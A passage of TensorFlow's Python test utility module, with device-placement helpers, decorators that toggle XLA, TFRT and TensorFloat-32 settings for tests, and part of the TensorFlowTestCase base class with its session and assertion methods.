"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
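# Usage sketch for the placement helpers above: run a small computation on a
# GPU when one is available, otherwise fall back to the CPU. The helper name
# is hypothetical and assumes the `context` and `math_ops` imports already
# present in this module.
def _example_add_on_preferred_device(x, y):
  """Adds `x` and `y` on the GPU if one is available, else on the CPU."""
  with context.eager_mode():
    with device(use_gpu=True):
      return math_ops.add(x, y)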
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders, we should be able
to call self.evaluate(); however, this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable logging for OutOfRangeError, which would otherwise make the
# output of tf.data tests hard to read, because OutOfRangeError is used to
# signal completion.
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
# Restore the environment even if the test body raises, so autotune
# settings do not leak into subsequent tests.
try:
  result = f(self, *args, **kwargs)
finally:
  if original_tf_cudnn_use_autotune is None:
    del os.environ["TF_CUDNN_USE_AUTOTUNE"]
  else:
    os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
  if original_xla_flags is None:
    del os.environ["XLA_FLAGS"]
  else:
    os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
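# Usage sketch for `disable_cudnn_autotune`: the hypothetical test below
# checks that autotuning is switched off for the duration of the test body.
# Assumes the `os` and `googletest` imports already present in this module.
class _ExampleNoAutotuneTest(googletest.TestCase):

  @disable_cudnn_autotune
  def test_autotune_disabled(self):
    self.assertEqual("false", os.environ.get("TF_CUDNN_USE_AUTOTUNE"))
    self.assertIn("--xla_gpu_autotune_level=0",
                  os.environ.get("XLA_FLAGS", ""))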
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description): # pylint: disable=unused-argument
"""Execute the test method only if xla is not enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_mlir_bridge(description): # pylint: disable=unused-argument
"""Execute the test method only if MLIR bridge is not enabled."""
execute_func = not is_mlir_bridge_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
def disable_tfrt_impl(cls_or_func):
"""Execute the test only if tfrt is not enabled."""
if tf_inspect.isclass(cls_or_func):
if tfrt_utils.enabled():
return None
else:
return cls_or_func
else:
def decorator(func):
def decorated(self, *args, **kwargs):
if tfrt_utils.enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if cls_or_func is not None:
return decorator(cls_or_func)
return decorator
return disable_tfrt_impl
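# Usage sketch for `disable_tfrt`: skip a test class entirely when the TFRT
# runtime is enabled (the decorated class becomes None in that case). The
# class and reason are hypothetical; assumes the `tfrt_utils` and
# `googletest` imports already present in this module.
@disable_tfrt("Hypothetical: feature not yet supported on TFRT")
class _ExampleNonTfrtTest(googletest.TestCase):

  def test_runs_only_without_tfrt(self):
    self.assertFalse(tfrt_utils.enabled())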
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
The given decorator is expected to take some arguments and return a method
decorator that is then applied to each test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given class's test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
"""This test is not intended to be run with XLA auto jit enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
# The description is just for documentation purposes.
def run_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute test with TensorFloat-32 disabled.
While almost every real-world deep learning model runs fine with
TensorFloat-32, many tests use assertAllClose or similar methods.
TensorFloat-32 matmuls typically will cause such methods to fail with the
default tolerances.
Args:
description: A description used for documentation purposes, describing why
the test requires TensorFloat-32 to be disabled.
Returns:
Decorator which runs a test with TensorFloat-32 disabled.
"""
def decorator(f):
@functools.wraps(f)
def decorated(self, *args, **kwargs):
allowed = config.tensor_float_32_execution_enabled()
try:
config.enable_tensor_float_32_execution(False)
f(self, *args, **kwargs)
finally:
config.enable_tensor_float_32_execution(allowed)
return decorated
return decorator
# The description is just for documentation purposes.
def run_all_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute all tests in a class with TensorFloat-32 disabled."""
return for_all_test_methods(run_without_tensor_float_32, description)
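# Usage sketch for `run_all_without_tensor_float_32` (built on
# `for_all_test_methods`): every test method of the hypothetical class below
# runs with TensorFloat-32 disabled. Assumes the `config` and `googletest`
# imports already present in this module.
@run_all_without_tensor_float_32(
    "Hypothetical: comparisons need full float32 precision")
class _ExampleNoTF32Test(googletest.TestCase):

  def test_tf32_is_disabled(self):
    self.assertFalse(config.tensor_float_32_execution_enabled())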
def matmul_without_tf32(a, b, *args, **kwargs):
"""Run matmul but cast float32 inputs to float64 if TensorFloat-32 is enabled.
This effectively runs matmul without TensorFloat-32. It should only be used in
tests when verifying some other op or functions works correctly, e.g. to test
`tf.linalg.sqrtm` by matrix multiplying the output of the op by itself. In
such cases, the matmul itself is not being tested so it's OK to run it with
higher precision.
If a matmul itself is being tested, or some other op which uses matmul, use
`run_without_tensor_float_32` instead.
This also casts complex64 inputs to complex128, since TensorFloat-32 can also
be used with complex64.
Args:
a: First input to tf.linalg.matmul
b: Second input to tf.linalg.matmul
*args: Other positional arguments to tf.linalg.matmul
**kwargs: Other keyword arguments to tf.linalg.matmul
Returns:
A tensor with the same type as `a`.
"""
if config.tensor_float_32_execution_enabled() and a.dtype == "float32":
a = math_ops.cast(a, "float64")
b = math_ops.cast(b, "float64")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
elif config.tensor_float_32_execution_enabled() and a.dtype == "complex64":
a = math_ops.cast(a, "complex128")
b = math_ops.cast(b, "complex128")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
else:
return math_ops.matmul(a, b, *args, **kwargs)
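# Usage sketch for `matmul_without_tf32`: compute a reference product for
# comparisons while TensorFloat-32 may be enabled elsewhere. The helper name
# is hypothetical and assumes the `context` import already present in this
# module.
def _example_reference_product(a, b):
  """Returns `a @ b` as a numpy array, unaffected by TensorFloat-32."""
  with context.eager_mode():
    return matmul_without_tf32(a, b).numpy()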
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
# Check if the mlir bridge has been explicitly enabled or disabled. If
# is_mlir_bridge_enabled() returns None, the user did not explicitly enable
# or disable the bridge so do not update enable_mlir_bridge.
if is_mlir_bridge_enabled():
context.context().enable_mlir_bridge = True
elif is_mlir_bridge_enabled() is not None:
context.context().enable_mlir_bridge = False
self._threads = []
self._tempdir = None
self._cached_session = None
self._test_start_time = None
# This flag provides the ability to control whether the graph mode gets
# initialized for TF1 or not. Initializing for TF1, which is what was
# happening earlier, was preventing enablement of 'eager mode' in the test.
self._set_default_seed = True
def setUp(self):
super(TensorFlowTestCase, self).setUp()
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
if self._set_default_seed:
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoid running setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
super(TensorFlowTestCase, self).tearDown()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during a test, it will return the
same folder. However, across different runs the directories will be
different. This ensures that tests run at different times cannot pollute
each other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then uses assertProtoEqual()
in case of failure, as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, (str, bytes)):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s." %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
# Convert tensors and composite tensors to numpy arrays.
return nest.map_structure(lambda t: t.numpy(), tensor,
expand_composites=True)
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=True, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session():
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=True,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session() as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=True,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminated due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True from just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tf_type(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
# np.allclose does not always work for our custom bfloat16 extension type
# when type promotions are involved, so we first cast any bfloat16 arrays
# to float32.
a_dtype = a.dtype
a = a.astype(np.float32) if a.dtype == dtypes.bfloat16.as_numpy_dtype else a
b = b.astype(np.float32) if b.dtype == dtypes.bfloat16.as_numpy_dtype else b
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a_dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if that does not work, traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
